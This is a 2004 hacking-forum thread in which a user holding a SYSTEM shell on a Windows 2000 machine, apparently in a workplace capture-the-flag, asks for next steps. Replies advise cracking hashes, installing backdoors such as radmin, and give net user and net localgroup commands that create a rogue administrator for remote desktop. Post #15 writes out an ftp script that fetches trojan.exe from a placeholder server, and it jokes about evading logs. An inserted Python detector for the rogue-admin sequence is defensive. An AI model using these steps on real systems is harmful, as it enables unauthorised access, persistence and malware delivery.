Cmd.exe Shell With System Lev Priv, What Do Next?
#1
Posted 18 August 2004 - 01:27 PM
We have a training exercise going on here at work, something like "capture the flag".
I was able to obtain a remote command shell with system level privileges from a W2K box, but I don't know what to do next.
My thoughts were maybe running pwdump3e to dump the hashes, but I don't know how to run that remotely, because I don't have the admin password yet.
I was able to use "enum" to enumerate usernames from my target machine, but I don't have any passwords.
The ports that are open on my target machine: 25, 80, 135, 139, 443, 445, 1025, 1026, 3389.
I also thought about mapping a share remotely, and then poking around on the target machine, to see if I can find the hidden flags, but I think I have to have a valid username and password to do that.
The goal of this exercise is for me to be able to gain additional privileges (i.e. administrator) and find files and scripts with passwords, network design, or any useful documents.
Any ideas?
#5
Posted 18 August 2004 - 01:37 PM
#7
Posted 18 August 2004 - 03:07 PM
brOmstar, on Aug 18 2004, 01:33 PM, said:
Stupid question... how can I add a new user? What do I need? What is a terminal client?
:unsure:
#8
Posted 18 August 2004 - 03:11 PM
Now use LC5, or if you have rainbowcrack tables, rcrack; normally you can crack all passwords. Or you add a new user with admin rights, or you install a backdoor like radmin :( You have the choice ;)
#9
Posted 18 August 2004 - 03:25 PM
KuerbY, on Aug 18 2004, 03:11 PM, said:
Now use LC5, or if you have rainbowcrack tables, rcrack; normally you can crack all passwords. Or you add a new user with admin rights, or you install a backdoor like radmin :( You have the choice ;)
But how can somebody start or transfer r_admin without exec rights?
#10
Posted 18 August 2004 - 04:42 PM
@cmdline with sys privileges, type
net user username password /add
net localgroup administrators username /add
(if it's a domain controller, also add)
net group "domain admins" username /add
After that is done, simply open the remote desktop client on your own box and connect to the IP (included in XP / downloadable from MS for 2000 / under *nix use rdesktop as the client).
When the logon screen appears, use your created account -> you're admin with a full remote desktop session. What more do you want?
Now you can do anything you can do on your own system!!
@carny you are the system, you can do anything
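From the defender's side, the sequence in this post (an account created, then put into Administrators, by the same subject within minutes) is a high-signal pattern in the Windows Security log. The following is an added example, not code from the thread: the event IDs are the real ones (624/636 on Windows 2000/2003, 4720/4732 on Vista and later), while the pipe-separated export format and the sample records are constructed.

```python
# Added example, not from the thread: detect the net user /add followed by
# net localgroup administrators /add sequence in a Windows Security log export.
# Real event IDs: 624/636 on Windows 2000/2003, 4720/4732 on Vista and later.
# The pipe-separated export format and the sample records are constructed.
from datetime import datetime

ACCOUNT_CREATED = {624, 4720}           # User Account Created
LOCAL_GROUP_MEMBER_ADDED = {636, 4732}  # Member added to security-enabled local group
ADMIN_GROUP = "administrators"

def parse(line):
    # Constructed format: timestamp|event id|subject (who did it)|target account|group
    ts, eid, subject, target, group = line.split("|")
    return {"ts": datetime.fromisoformat(ts), "id": int(eid),
            "subject": subject, "target": target, "group": group}

def find_rogue_admins(lines, window_minutes=30):
    """Return (target, subject) pairs where the same subject created an account and
    put it into Administrators within window_minutes, in chronological order."""
    created = {}  # lowercased target -> (creation time, subject)
    hits = []
    for rec in sorted((parse(l) for l in lines), key=lambda r: r["ts"]):
        if rec["id"] in ACCOUNT_CREATED:
            created[rec["target"].lower()] = (rec["ts"], rec["subject"])
        elif rec["id"] in LOCAL_GROUP_MEMBER_ADDED and rec["group"].lower() == ADMIN_GROUP:
            entry = created.get(rec["target"].lower())
            if entry is None:
                continue  # pre-existing account promoted: a different, weaker signal
            t0, who = entry
            if who == rec["subject"] and (rec["ts"] - t0).total_seconds() <= window_minutes * 60:
                hits.append((rec["target"], who))
    return hits

# Constructed sample export. W2KSRV$ is the machine account, which is how actions
# taken from a SYSTEM-level shell (as in the thread) are attributed in the log.
SAMPLE_LOG = [
    "2004-08-18T09:00:00|624|alice|svc_print|",
    "2004-08-18T09:00:30|636|alice|svc_print|Users",                  # normal: not Administrators
    "2004-08-17T10:00:00|636|bob|carol|Administrators",               # no creation event: skipped
    "2004-08-18T16:40:00|624|W2KSRV$|backup2|",
    "2004-08-18T16:40:05|636|W2KSRV$|backup2|Administrators",         # the thread's sequence
    "2004-08-18T17:00:00|4720|Administrator|tempadm|",
    "2004-08-18T18:00:00|4732|Administrator|tempadm|Administrators",  # 60 min: outside window
]

if __name__ == "__main__":
    for target, subject in find_rogue_admins(SAMPLE_LOG):
        print(f"new local admin {target!r} created and promoted by {subject!r}")
```

The subject being the machine account (or SYSTEM) on an account-creation event is itself worth alerting on, since interactive administrators do not normally create accounts that way.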
#11
Posted 18 August 2004 - 05:25 PM
I used the tips given above and created a new user and added that user to the administrators group. I then connected to C$ and was able to view files on my target system. My co-worker, who set up this lab, had files on the target system that contained usernames and passwords, and I was able to find those files.
Next, I need to figure out how to upload tools. Can you do that with the remote administration utility? I'm getting ready to try that now.
Also, do you all know of any good backdoors for W2K?
Thanks again for your help.
#13
Posted 18 August 2004 - 06:52 PM
vicky, on Aug 18 2004, 07:34 PM, said:
true :)
but make sure you execute the backdoor from the cmd shell
not from explorer view in the share (using double click) since that'll make the backdoor run on your computer
#14
Posted 18 August 2004 - 07:08 PM
annointed3, on Aug 18 2004, 01:27 PM, said:
We have a training exercise going on here at work, something like "capture the flag".
Then why are you asking all these questions? I mean, aren't they teaching you anything?
Besides, you ask us what to do next; I think you need to capture the flag...
And besides, if you have (created) an admin account and you can access it using a remote screen, why do you need a backdoor then? You can do everything possible then, so capture the so-called flag.
#15
Posted 19 August 2004 - 02:38 AM
echo open blablaftpserver PORT >> c:\whereuwant.txt
echo user blaaaa >> c:\whereuwant.txt
echo pass böaaa >> c:\whereuwant.txt
echo BINARY >> c:\whereuwant.txt
echo get trojan.exe >> c:\whereuwant.txt
echo get trojan.dll >> c:\whereuwant.txt
echo quit >> c:\whereuwant.txt
hehe ;)
It'll only work if ftp.exe is available ;)
Have fun with capturing the logs you have left ^^
Edit: another example ;D
Sex is like hacking: you get in, you get out, and you hope that you didn't leave something behind that can be traced back to you ^^
gr€€tZ fL4Shb4Ck